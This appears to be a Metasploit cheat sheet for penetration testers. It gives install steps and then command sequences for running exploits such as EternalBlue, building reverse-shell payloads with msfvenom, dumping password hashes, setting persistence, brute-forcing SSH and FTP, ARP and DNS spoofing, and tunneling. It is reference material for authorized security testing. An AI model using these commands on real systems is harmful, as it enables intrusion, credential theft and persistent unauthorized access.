Metasploit

Metasploit Logo
Metasploit is a widely-used security tool for penetration testing, vulnerability scanning, and exploit development. It helps security professionals identify weaknesses, automate attacks, and validate defenses, making it an essential asset for both offensive and defensive cybersecurity strategies.
Download Metasploit
Navigation
  • Installation and Setup
  • Exploit Commands
  • Payload Generation
  • Post-Exploitation
  • Session Management
  • Brute Force and Password Cracking
  • Network Attacks
  • Service Enumeration
  • Web Application Exploitation
  • Privilege Escalation
  • Meterpreter Commands
  • Auxiliary Modules
  • Vulnerability Scanning and Information Gathering
  • Tunneling and Proxying

Installation and Setup

Installing the Metasploit Framework on Windows

  1. Download the Windows Installer.
  2. After downloading the installer, locate the file, right-click, and select Run as Administrator.
  3. When the Setup screen appears, click Next to continue.
  4. Read the license agreement and select the I accept the license agreement option. Click Next to continue.
  5. Browse to the location where you want to install the Metasploit Framework. By default, the framework is installed on the C:\ Metasploit-framework directory. Click Next to continue.
  6. Click Install.
  7. When the installation completes, click the Finish button.
  8. To launch msfconsole after the installation completes, run the following from the command line:
msfconsole.bat

Installing the Metasploit Framework on Linux

  1. Open the terminal.
  2. Enter the following command to add the build repository and install the Metasploit Framework package:
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall

3. After the installation completes, open a terminal window and type the following to start msfconsole:

./msfconsole

4. The prompt asks if you want to use and set up a new database. Type y or yes to run the initial configuration script to create the initial database.

5. To check to see if the database was set up, run the following command:

db_status

6. If the Metasploit Framework successfully connected to the database, the following status displays:

[*] postgresql connected to msf

Running, Connecting and Update

msfconsole                                                      #Start the Metasploit Console
msfvenom -h                                                     #Display msfvenom Help
msfdb init                                                      #Initialize Metasploit Database
msfconsole -x "db_connect user:password@localhost/metasploit"   #Connect to Metasploit Database
msfupdate                                                       #Update Metasploit Framework

Exploit Commands

use exploit/windows/smb/ms17_010_eternalblue   #Select Exploit (Eternal Blue Example)
use exploit/unix/ftp/vsftpd_234_backdoor       #Select Exploit (vsFTP Example)
search exploit_type:remote                     #Search for remote exploits
show exploits                                  #Show all available exploits
set RHOSTS 10.1.1.1                            #Set Remote Host
set RPORT 445                                  #Set Remote Port
set PAYLOAD windows/meterpreter/reverse_tcp    #Set Payload
exploit                                        #Run Exploit
run                                            #Run Exploit
exploit -j -z                                  #Run exploit in the background (jobs mode)

Payload Generation

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=4444 -f exe > payload.exe       #Create Windows Reverse TCP Payload
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.1.1.1 LPORT=4444 -f elf > payload.elf           #Create Linux Reverse TCP Payload
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.1.1.1 LPORT=4444 -f raw > payload.php           #Create PHP Reverse TCP Payload
msfvenom -p windows/meterpreter/reverse_https LHOST=10.1.1.1 LPORT=4444 -f exe > payload.exe     #Create Reverse HTTPS Payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=4444 -f exe > payload.exe   #Create x64 Payload

Post-Exploitation

sessions -l                                       #List all active sessions
sessions -i 1                                     #Interact with session 1
sysinfo                                           #Get System Information
getuid                                            #Get current user ID
hashdump                                          #Dump Windows Hashes
migrate 1234                                      #Migrate to process ID 1234
run persistence -U -X -i 5 -p 4444 -r 10.1.1.1    #Set up persistence

Session Management

sessions -i 1               #Interact with session 1
sessions -k 1               #Kill session 1
sessions -L                 #List all sessions
sessions -t 1               #List detailed information about session 1
background                  #Send session to background
exit                        #Exit the current session

Brute Force and Password Cracking

use auxiliary/scanner/ssh/ssh_login          #SSH Brute Force Scanner
set RHOSTS 10.1.1.1                          #Set target host
set USER_FILE /path/to/usernames.txt         #Set file with usernames
set PASS_FILE /path/to/passwords.txt         #Set file with passwords
run                                          #Run Brute Force Attack

use auxiliary/scanner/ftp/ftp_login          #FTP Brute Force Scanner
set RHOSTS 10.1.1.1                          #Set target host
set USER_FILE /path/to/usernames.txt         #Set file with usernames
set PASS_FILE /path/to/passwords.txt         #Set file with passwords
run                                          #Run FTP Brute Force Attack

Network Attacks

use auxiliary/spoof/dns/forwarder           #DNS Spoofing
set RHOSTS 10.1.1.1                         #Set target host
set LHOST 10.1.1.1                          #Set local host
run                                         #Run DNS Spoofing

use auxiliary/spoof/arp/arp_poisoning       #ARP Spoofing
set RHOSTS 10.1.1.1                         #Set target host
set INTERFACE eth0                          #Set Network Interface
run                                         #Run ARP Spoofing

Service Enumeration

use auxiliary/scanner/smb/smb_version       #SMB Version Enumeration
set RHOSTS 10.1.1.1                         #Set target host
run                                         #Run SMB version scan

use auxiliary/scanner/ftp/ftp_version       #FTP Version Enumeration
set RHOSTS 10.1.1.1                         #Set target host
run                                         #Run FTP version scan

use auxiliary/scanner/ssh/ssh_version       #SSH Version Enumeration
set RHOSTS 10.1.1.1                         #Set target host
run                                         #Run SSH version scan

Web Application Exploitation

use exploit/unix/webapp/php_cgi_arg_injection   #PHP CGI Argument Injection Exploit
set RHOSTS 10.1.1.1                             #Set target host
set RPORT 80                                    #Set target port
run                                             #Run Exploit

use auxiliary/scanner/http/dir_scanner          #Directory Bruteforce Scanner
set RHOSTS 10.1.1.1                             #Set target host
set PATHS /path/to/wordlist                     #Set wordlist for directories
run                                             #Run Brute Force Directory Scanner

Privilege Escalation

use post/multi/recon/local_exploit_suggester   #Suggest Exploits for Privilege Escalation
set SESSION 1                                  #Set session ID
run                                            #Run the exploit suggestion

use post/windows/gather/enum_tokens            #Gather tokens for privilege escalation
set SESSION 1                                  #Set session ID
run                                            #Run token enumeration

Meterpreter Commands

sysinfo                                              #Get system information
getuid                                               #Get current user ID
upload /path/to/file /tmp/                           #Upload a file to the target system
download /tmp/file /path/to/save/                    #Download a file from the target system
run persistence -U -X -i 5 -p 4444 -r 10.1.1.1       #Set up persistence
shell                                                #Drop into a system shell

Auxiliary Modules

use auxiliary/scanner/portscan/tcp           #TCP Port Scanner
set RHOSTS 10.1.1.1                          #Set target host
set THREADS 10                               #Set number of threads
run                                          #Run Port Scan

use auxiliary/admin/smb/smb_enumshares       #SMB Share Enumeration
set RHOSTS 10.1.1.1                          #Set target host
run                                          #Run SMB Share Enumeration

Vulnerability Scanning and Information Gathering

use auxiliary/scanner/http/dir_scanner           #Directory Scanner
set RHOSTS 10.1.1.1                              #Set target host
set PATHS /usr/share/wordlists/dirb/common.txt   #Set directory wordlist
run                                              #Run Directory scan

use auxiliary/scanner/ssl/ssl_version            #SSL Version Enumeration
set RHOSTS 10.1.1.1                              #Set target host
run                                              #Run SSL scan

Tunneling and Proxying

use auxiliary/server/socks_proxy            #Start SOCKS Proxy
set SRVPORT 1080                            #Set proxy port
run                                         #Run proxy server

use auxiliary/server/http_proxy             #Start HTTP Proxy
set SRVPORT 8080                            #Set HTTP proxy port
run                                         #Run HTTP proxy server